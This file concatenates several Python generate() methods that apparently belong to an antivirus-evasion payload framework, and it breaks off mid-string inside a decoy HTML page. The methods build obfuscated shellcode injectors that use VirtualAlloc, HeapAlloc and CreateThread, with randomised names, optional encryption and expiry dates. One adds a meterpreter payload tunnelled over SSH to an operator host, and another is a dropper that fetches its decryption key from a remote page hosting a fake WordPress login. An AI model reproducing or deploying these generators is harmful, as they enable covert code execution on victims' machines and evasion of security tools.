def generate(self): # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # build our your payload sourcecode PayloadCode = "..." # add in a randomized string PayloadCode += helpers.randomString() # example of how to check the internal options if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) # return everything return PayloadCode
def generate(self): # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # build our your payload sourcecode PayloadCode = "..." # add in a randomized string PayloadCode += helpers.randomString() # example of how to check the internal options if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) # return everything return PayloadCode
def generate(self): self._validateArchitecture() python_source = self.required_options["python_source"][0] try: # read in the python source f = open(python_source, 'r') PayloadCode = f.read() f.close() except IOError: print helpers.color("\n [!] python_source file \""+python_source+"\" not found\n", warning=True) return "" # example of how to check the internal options if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) # return everything return PayloadCode
def generate(self): self._validateArchitecture() PYTHON_SOURCE = self.required_options["PYTHON_SOURCE"][0] try: # read in the python source f = open(PYTHON_SOURCE, 'r') PayloadCode = f.read() f.close() except IOError: print helpers.color("\n [!] PYTHON_SOURCE file \""+PYTHON_SOURCE+"\" not found\n", warning=True) return "" # example of how to check the internal options if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) # return everything return PayloadCode
def generate(self): if self.required_options["INJECT_METHOD"][0].lower() == "virtual": if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandT = helpers.randomString() randctypes = helpers.randomString() PayloadCode = "import ctypes as " + randctypes + "\n" PayloadCode += "import base64\n" PayloadCode += RandT + ' = "' + EncodedShellcode + '"\n' PayloadCode += ( ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n" ) PayloadCode += ( RandPtr + " = " + randctypes + ".windll.kernel32.VirtualAlloc(" + randctypes + ".c_int(0)," + randctypes + ".c_int(len(" + ShellcodeVariableName + "))," + randctypes + ".c_int(0x3000)," + randctypes + ".c_int(0x40))\n" ) PayloadCode += ( RandBuf + " = (" + randctypes + ".c_char * len(" + ShellcodeVariableName + ")).from_buffer(" + ShellcodeVariableName + ")\n" ) PayloadCode += ( randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + RandPtr + ")," + RandBuf + "," + randctypes + ".c_int(len(" + ShellcodeVariableName + ")))\n" ) PayloadCode += ( RandHt + " = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + RandPtr + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n" ) PayloadCode += ( randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(" + RandHt + ")," + randctypes + ".c_int(-1))\n" ) if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and 
add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandT = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() randctypes = helpers.randomString() PayloadCode = "import ctypes as " + randctypes + "\n" PayloadCode += "import base64\n" PayloadCode += "from datetime import datetime\n" PayloadCode += "from datetime import date\n\n" PayloadCode += RandToday + " = datetime.now()\n" PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n' PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n" PayloadCode += "\t" + RandT + ' = "' + EncodedShellcode + '"\n' PayloadCode += ( "\t" + ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n" ) PayloadCode += ( "\t" + RandPtr + " = " + randctypes + ".windll.kernel32.VirtualAlloc(" + randctypes + ".c_int(0)," + randctypes + ".c_int(len(" + ShellcodeVariableName + "))," + randctypes + ".c_int(0x3000)," + randctypes + ".c_int(0x40))\n" ) PayloadCode += ( "\t" + RandBuf + " = (" + randctypes + ".c_char * len(" + ShellcodeVariableName + ")).from_buffer(" + ShellcodeVariableName + ")\n" ) PayloadCode += ( "\t" + randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + RandPtr + ")," + RandBuf + "," + randctypes + ".c_int(len(" + ShellcodeVariableName + ")))\n" ) PayloadCode += ( "\t" + RandHt + " = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + RandPtr + ")," + 
randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n" ) PayloadCode += ( "\t" + randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(" + RandHt + ")," + randctypes + ".c_int(-1))\n" ) if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode if self.required_options["INJECT_METHOD"][0].lower() == "heap": if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandT = helpers.randomString() HeapVar = helpers.randomString() randctypes = helpers.randomString() PayloadCode = "import ctypes as " + randctypes + "\n" PayloadCode += "import base64\n" PayloadCode += RandT + ' = "' + EncodedShellcode + '"\n' PayloadCode += ( ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n" ) PayloadCode += ( HeapVar + " = " + randctypes + ".windll.kernel32.HeapCreate(" + randctypes + ".c_int(0x00040000)," + randctypes + ".c_int(len(" + ShellcodeVariableName + ") * 2)," + randctypes + ".c_int(0))\n" ) PayloadCode += ( RandPtr + " = " + randctypes + ".windll.kernel32.HeapAlloc(" + randctypes + ".c_int(" + HeapVar + ")," + randctypes + ".c_int(0x00000008)," + randctypes + ".c_int(len( " + ShellcodeVariableName + ")))\n" ) PayloadCode += ( RandBuf + " = (" + randctypes + ".c_char * len(" + ShellcodeVariableName + ")).from_buffer(" + ShellcodeVariableName + ")\n" ) PayloadCode += ( randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + RandPtr + ")," + RandBuf + "," + randctypes + ".c_int(len(" + ShellcodeVariableName + ")))\n" 
) PayloadCode += ( RandHt + " = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + RandPtr + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n" ) PayloadCode += ( randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(" + RandHt + ")," + randctypes + ".c_int(-1))\n" ) if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandT = helpers.randomString() HeapVar = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() randctypes = helpers.randomString() PayloadCode = "import ctypes as " + randctypes + "\n" PayloadCode += "import base64\n" PayloadCode += "from datetime import datetime\n" PayloadCode += "from datetime import date\n\n" PayloadCode += RandToday + " = datetime.now()\n" PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n' PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n" PayloadCode += "\t" + RandT + ' = "' + EncodedShellcode + '"\n' PayloadCode += ( "\t" + ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n" ) PayloadCode += ( "\t" + HeapVar + " = " + randctypes + ".windll.kernel32.HeapCreate(" + randctypes + ".c_int(0x00040000)," + randctypes + 
".c_int(len(" + ShellcodeVariableName + ") * 2)," + randctypes + ".c_int(0))\n" ) PayloadCode += ( "\t" + RandPtr + " = " + randctypes + ".windll.kernel32.HeapAlloc(" + randctypes + ".c_int(" + HeapVar + ")," + randctypes + ".c_int(0x00000008)," + randctypes + ".c_int(len( " + ShellcodeVariableName + ")))\n" ) PayloadCode += ( "\t" + RandBuf + " = (" + randctypes + ".c_char * len(" + ShellcodeVariableName + ")).from_buffer(" + ShellcodeVariableName + ")\n" ) PayloadCode += ( "\t" + randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + RandPtr + ")," + RandBuf + "," + randctypes + ".c_int(len(" + ShellcodeVariableName + ")))\n" ) PayloadCode += ( "\t" + RandHt + " = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + RandPtr + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n" ) PayloadCode += ( "\t" + randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(" + RandHt + ")," + randctypes + ".c_int(-1))\n" ) if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() DecodedShellcode = helpers.randomString() # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) PayloadCode = "from ctypes import *\n" PayloadCode += "import base64\n" PayloadCode += ShellcodeVariableName + ' = "' + EncodedShellcode + '"\n' PayloadCode += ( DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n" ) 
PayloadCode += ( RandMemoryShell + " = create_string_buffer(str(" + DecodedShellcode + "), len(str(" + DecodedShellcode + ")))\n" ) PayloadCode += RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n" PayloadCode += RandShellcode + "()" if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() DecodedShellcode = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) PayloadCode = "from ctypes import *\n" PayloadCode += "import base64\n" PayloadCode += "from datetime import datetime\n" PayloadCode += "from datetime import date\n\n" PayloadCode += RandToday + " = datetime.now()\n" PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n' PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n" PayloadCode += "\t" + ShellcodeVariableName + ' = "' + EncodedShellcode + '"\n' PayloadCode += ( "\t" + DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n" ) PayloadCode += ( "\t" + RandMemoryShell + " = create_string_buffer(str(" + DecodedShellcode + "), len(str(" + DecodedShellcode + ")))\n" ) PayloadCode += "\t" + RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n" PayloadCode += "\t" + RandShellcode + "()" if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = 
encryption.pyherion(PayloadCode) return PayloadCode
def generate(self): self.shellcode.SetPayload(["windows/meterpreter/bind_tcp", ["LHOST=127.0.0.1", "LPORT=" + self.required_options["LPORT"][0]]]) Shellcode = self.shellcode.generate() PayloadCode = """from socket import * import paramiko import multiprocessing import time import subprocess import ctypes import thread import threading import select def inject(shellcode): ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr), ctypes.c_int(len(shellcode))) buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode))) ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0))) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1)) def handler(chan, host, port): sock = socket() try: sock.connect((host, port)) except Exception: pass while True: r, w, x = select.select([sock, chan], [], []) if sock in r: data = sock.recv(1024) if len(data) == 0: break chan.send(data) if chan in r: data = chan.recv(1024) if len(data) == 0: break sock.send(data) chan.close() sock.close() def reverse_forward_tunnel(server_port, remote_host, remote_port, transport): transport.request_port_forward('', server_port) while True: chan = transport.accept(1000) if chan is None: continue thr = threading.Thread(target=handler, args=(chan, remote_host, remote_port)) thr.setDaemon(True) thr.start() def main(user,password, rhost, port, shellport): server = [rhost, int(port)] remote = ['127.0.0.1', int(shellport)] client = paramiko.SSHClient() client.load_system_host_keys() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: client.connect(server[0], server[1], username=user, key_filename=None, look_for_keys=False, password=password) except Exception: 
pass try: reverse_forward_tunnel(int(shellport), remote[0], remote[1], client.get_transport()) except Exception: pass if __name__ == '__main__': multiprocessing.freeze_support() shellcode = r"%s" shellcode = shellcode.decode("string_escape") shellcode = bytearray(shellcode) shellport = "%s" time.sleep(2) p = multiprocessing.Process(target=inject, args=(shellcode,)) jobs = [] jobs.append(p) p.start() user = "******" password = "******" rhost = "%s" port = "%s" time.sleep(3) thread.start_new_thread(main,(user, password, rhost, port, shellport))""" % (Shellcode, self.required_options["LPORT"][0], self.required_options["SSHUSER"][0], self.required_options["SSHPASS"][0], self.required_options["SSHOST"][0], self.required_options["SSHPORT"][0]) if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode
def generate(self): if self.required_options["INJECT_METHOD"][0].lower() == "virtual": if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandT = helpers.randomString() PayloadCode = 'import ctypes as avlol\n' PayloadCode += 'import base64\n' PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n" PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n" PayloadCode += RandPtr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len(' + ShellcodeVariableName + ')),avlol.c_int(0x3000),avlol.c_int(0x40))\n' PayloadCode += RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n' PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta( days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) 
# Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandT = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() PayloadCode = 'import ctypes as avlol\n' PayloadCode += 'import base64\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[ 2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + RandT + " = \"" + EncodedShellcode + "\"\n" PayloadCode += '\t' + ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n" PayloadCode += '\t' + RandPtr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len(' + ShellcodeVariableName + ')),avlol.c_int(0x3000),avlol.c_int(0x40))\n' PayloadCode += '\t' + RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += '\t' + 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n' PayloadCode += '\t' + 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode if self.required_options["INJECT_METHOD"][0].lower() == "heap": if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Base64 Encode Shellcode 
EncodedShellcode = base64.b64encode(Shellcode) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandT = helpers.randomString() HeapVar = helpers.randomString() PayloadCode = 'import ctypes as avlol\n' PayloadCode += 'import base64\n' PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n" PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n" PayloadCode += HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + ShellcodeVariableName + ') * 2),avlol.c_int(0))\n' PayloadCode += RandPtr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + ShellcodeVariableName + ')))\n' PayloadCode += RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n' PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta( days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() 
RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandT = helpers.randomString() HeapVar = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() PayloadCode = 'import ctypes as avlol\n' PayloadCode += 'import base64\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[ 2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + RandT + " = \"" + EncodedShellcode + "\"\n" PayloadCode += '\t' + ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n" PayloadCode += '\t' + HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + ShellcodeVariableName + ') * 2),avlol.c_int(0))\n' PayloadCode += '\t' + RandPtr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n' PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = 
self.shellcode.generate(self.required_options) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() DecodedShellcode = helpers.randomString() # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) PayloadCode = 'from ctypes import *\n' PayloadCode += 'import base64\n' PayloadCode += ShellcodeVariableName + " = \"" + EncodedShellcode + "\"\n" PayloadCode += DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n" PayloadCode += RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n' PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += RandShellcode + '()' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta( days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() DecodedShellcode = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) PayloadCode = 'from ctypes import *\n' PayloadCode += 'import base64\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[ 2:] + 
'\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + ShellcodeVariableName + " = \"" + EncodedShellcode + "\"\n" PayloadCode += '\t' + DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n" PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n' PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += '\t' + RandShellcode + '()' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode
def generate(self):
    """Build a Python dropper whose AES key (or "go" signal) lives on a web page.

    For every INJECT_METHOD the method first writes a decoy HTML page (a fake
    WordPress login form followed by a random HTML comment) to
    HTML_FILE_PATH + <last path segment of TARGET_SERVER>, hands that page body
    to encryption.encryptAES_http_request() to encrypt the msfvenom shellcode,
    and then emits a payload that polls TARGET_SERVER until it answers 200,
    MD5-hashes the page body and only then decrypts and runs the shellcode.
    The three branches differ in how the key reaches the payload and how the
    shellcode is executed:

      * "virtual": key = hexdigest of the fetched page (never embedded);
        VirtualAlloc + RtlMoveMemory + CreateThread.
      * "heap": generator-side `secret` is embedded literally; the fetched
        page is only a reachability gate; HeapCreate/HeapAlloc + CreateThread.
      * anything else, with EXPIRE_PAYLOAD == "x": `secret` embedded literally;
        create_string_buffer cast to CFUNCTYPE.  With any other EXPIRE_PAYLOAD
        value no branch matches and the method returns None.

    Returns:
        The payload source as a str (wrapped by encryption.pyherion() when
        USE_PYHERION is "y"), or None in the unmatched default case above.

    NOTE(review): the generated script does `except URLError, e:` but only
    `import urllib2` — URLError is never bound, so the retry/sleep loop raises
    NameError on the first connection failure instead of sleeping.
    NOTE(review): in this copy the nested indentation inside the generated
    while/try literals appears collapsed to single spaces (`' try:'` and its
    body at the same depth) — confirm against the original file.
    NOTE(review): the decryption key is the MD5 of the served bytes, so any
    server-side rewrite of the page (trailing newline, gzip, template injection)
    silently breaks decryption; presumably encryptAES_http_request() derives
    `secret` from html_data the same way — verify in the encryption module.
    """
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        TARGET_SERVER = str(self.required_options["TARGET_SERVER"][0])
        # The decoy page is named after the last URL path segment so the
        # payload's GET of TARGET_SERVER hits the file written below.
        target_html_file = str(TARGET_SERVER.split('/')[-1])
        # Pre-formatted as the inside of a ('User-agent', '...') tuple; the
        # closing quote and bracket are appended when the line is emitted.
        USER_AGENT = "'User-agent', '" + self.required_options['USER_AGENT'][0]
        # Generate Shellcode Using msfvenom
        Shellcode = self.shellcode.generate(self.required_options)
        # Generate Random Variable Names (ShellcodeVariableName is unused here)
        ShellcodeVariableName = helpers.randomString()
        RandPtr = helpers.randomString()
        RandBuf = helpers.randomString()
        RandHt = helpers.randomString()
        RandDecodeAES = helpers.randomString()
        RandCipherObject = helpers.randomString()
        RandDecodedShellcode = helpers.randomString()
        RandShellCode = helpers.randomString()
        RandPadding = helpers.randomString()
        # Define Random Variable Names for HTTP functions (RandSleep is unused)
        RandResponse = helpers.randomString()
        RandHttpKey = helpers.randomString()
        RandMD5 = helpers.randomString()
        RandKeyServer = helpers.randomString()
        RandSleep = helpers.randomString()
        # Define Random Variable Names for HTML Functions
        RandHttpstring = helpers.randomString()
        # Generate the decoy HTML page the web server must host; the random
        # trailing comment makes every generated page (and hence key) unique.
        f = open(str(self.required_options["HTML_FILE_PATH"][0]) + target_html_file, 'w')
        html_data = """ <!DOCTYPE html> <!--[if IE 8]> <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US"> <![endif]--> <!--[if !(IE 8) ]><!--> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><!--<![endif]--><head> <form name="loginform" id="loginform" action="http://mainpage/wp-login.php" method="post"> <p> <label for="user_login">Username<br> <input name="log" id="user_login" class="input" size="20" type="text"></label> </p> <p> <label for="user_pass">Password<br> <input name="pwd" id="user_pass" class="input" value="" size="20" type="password"></label> </p> <p class="forgetmenot"><label for="rememberme"><input name="rememberme" id="rememberme" value="forever" type="checkbox"> Remember Me</label></p> <p class="submit"> <input name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" type="submit"> <input name="redirect_to" value="http://www.google.com" type="hidden"> <input name="testcookie" value="1" type="hidden"> </p> </form> <p id="nav"> 